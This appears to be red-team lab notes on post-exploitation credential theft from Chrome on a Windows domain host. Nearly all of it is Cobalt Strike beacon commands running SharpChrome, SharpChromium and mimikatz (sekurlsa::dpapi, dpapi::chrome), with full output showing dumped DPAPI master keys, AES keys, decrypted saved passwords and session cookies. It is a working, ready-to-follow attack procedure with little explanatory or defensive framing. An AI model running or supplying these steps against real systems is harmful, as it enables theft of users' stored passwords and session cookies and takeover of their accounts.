Extracting logins/passwords, cookies and history data from browsers.
Some method requires local admin access
Chrome uses DPAPI to encrypt passwords
We will use SharpChrome to extract the details
GitHub: https://github.com/GhostPack/SharpDPAPI (Part of SharpDPAPI)
Find sites with login details
beacon> execute-assembly /opt/SharpCollection/NetFramework_4.0_Any/SharpChrome.exe logins
[*] Tasked beacon to run .NET program: SharpChrome.exe logins
[+] host called home, sent: 835127 bytes
[+] received output:
__ _
(_ |_ _. ._ ._ / |_ ._ _ ._ _ _
__) | | (_| | |_) \\_ | | | (_) | | | (/_
|
v1.9.2
[*] Action: Chrome Saved Logins Triage
[*] Triaging Chrome Logins for ALL users
[*] AES state key file : C:\\Users\\john\\AppData\\Local\\Google\\Chrome\\User Data\\Local State
[*] AES state key : MasterKey needed - {746fa65b-3590-4ef5-9c24-ef479ccec600}
--- Credential (Path: C:\\Users\\john\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data) ---
file_path,signon_realm,origin_url,date_created,times_used,username,password
C:\\Users\\john\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data,<http://10.128.0.30:8000/,http://10.128.0.30:8000/,3/26/2021> 1:01:31 PM,13261237291289480,ryan,--AES STATE KEY NEEDED--
SharpChrome completed in 00:00:00.4569699
Extract DPAPI key based on the master key above
beacon> mimikatz sekurlsa::dpapi
[*] Tasked beacon to run mimikatz's sekurlsa::dpapi command
[+] host called home, sent: 750721 bytes
[+] received output:
Authentication Id : 0 ; 6998111 (00000000:006ac85f)
Session : Interactive from 4
User Name : Administrator
Domain : EH
Logon Server : EHLAB-DC
Logon Time : 3/26/2021 11:29:02 AM
SID : S-1-5-21-2669240679-2768610461-1282890330-500
Authentication Id : 0 ; 5176335 (00000000:004efc0f)
Session : RemoteInteractive from 4
User Name : john
Domain : EH
Logon Server : EHLAB-DC
Logon Time : 3/26/2021 9:22:46 AM
SID : S-1-5-21-2669240679-2768610461-1282890330-1106
[00000000]
* GUID : {746fa65b-3590-4ef5-9c24-ef479ccec600}
* Time : 3/26/2021 11:26:54 AM
* MasterKey : 598246dbdc92bf08f075e13c30e6c1f68990e78fa869be10d9cb0e1c8f0947db79279eae0a76d153d77877abb44d1258bdc30997a37c55f63aa5a3cfe4ef1101
* sha1(key) : ab4e69c82cf98682805505384f1683bf475d9f10
Use the master key sha1 to decrypt login details
beacon> mimikatz dpapi::chrome /in:"C:\\Users\\john\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" /masterkey:ab4e69c82cf98682805505384f1683bf475d9f10
[*] Tasked beacon to run mimikatz's dpapi::chrome /in:"C:\\Users\\john\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" /masterkey:ab4e69c82cf98682805505384f1683bf475d9f10 command
[+] host called home, sent: 750191 bytes
[+] received output:
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI
* masterkey : ab4e69c82cf98682805505384f1683bf475d9f10
> AES Key is: 17228c756535118ee0e40a34ce32eaa1e5653c70ec60f98f9def0efa91351cfc
URL : <http://10.128.0.30:8000/> ( <http://10.128.0.30:8000/> )
Username: ryan
* using BCrypt with AES-256-GCM
Password: zX-7CMYG
Use the master key sha1 to decrypt cookies
beacon> mimikatz dpapi::chrome /in:"C:\\Users\\t.cobb\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" /masterkey:3772b1765c670951fff51d79ed5bdbc304b12d6c
[*] Tasked beacon to run mimikatz's dpapi::chrome /in:"C:\\Users\\t.cobb\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" /masterkey:3772b1765c670951fff51d79ed5bdbc304b12d6c command
[+] host called home, sent: 750191 bytes
[+] received output:
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI
* masterkey : 3772b1765c670951fff51d79ed5bdbc304b12d6c
> AES Key is: 9b1b98e962f3a2b132eb6724153ebd9d399326ebee905453234237a3b08f0efd
Host : .google.com ( / )
Name : CONSENT
Dates : 20/03/2020 11:52:02 -> 01/01/2038 00:00:29
* using BCrypt with AES-256-GCM
Cookie: WP.284a63.284d17
Host : .google.com ( / )
Name : NID
Dates : 15/03/2020 16:34:19 -> 14/09/2020 16:34:19
* using BCrypt with AES-256-GCM
Cookie: 200=Rwsc9XI-Nx6EzYK_s5QF38_PpyInwJ6EofpA9tTAVLCtfAZtM7Nfw09etrMrqpYNmQPpaV4c51Zg2bOV-00IPc0VLr3lPmiv9zr7Tkl6MyVzsEPat2b1BPvx5l0elQcKIhLXSXqu6HKovo6CzJJzdi_GuPOiUraoV-vSwikD0NMF
Extract from chrome:
beacon> execute-assembly /opt/SharpCollection/NetFramework_4.0_Any/SharpChromium.exe all
[*] Tasked beacon to run .NET program: SharpChromium.exe all
[+] host called home, sent: 612401 bytes
[+] received output:
[*] Beginning Google Chrome extraction.
[*] All cookies written to C:\\Users\\john\\AppData\\Local\\Temp\\4\\google-chrome-cookies.json
[+] received output:
--- Chromium History (User: john) ---
URL : <http://10.128.0.30:8000/>
Title : No Title
Visit Count : 2
Cookies :
--- Chromium Credential (User: john) ---
URL : <http://10.128.0.30:8000/action_page.php>
Username : ryan
Password : zX-7CMYG
--- Chromium Credential (User: john) ---
URL : <http://10.128.0.30:8000/action_page.php>
Username : ryan2
Password : Password1!
[*] Finished Google Chrome extraction.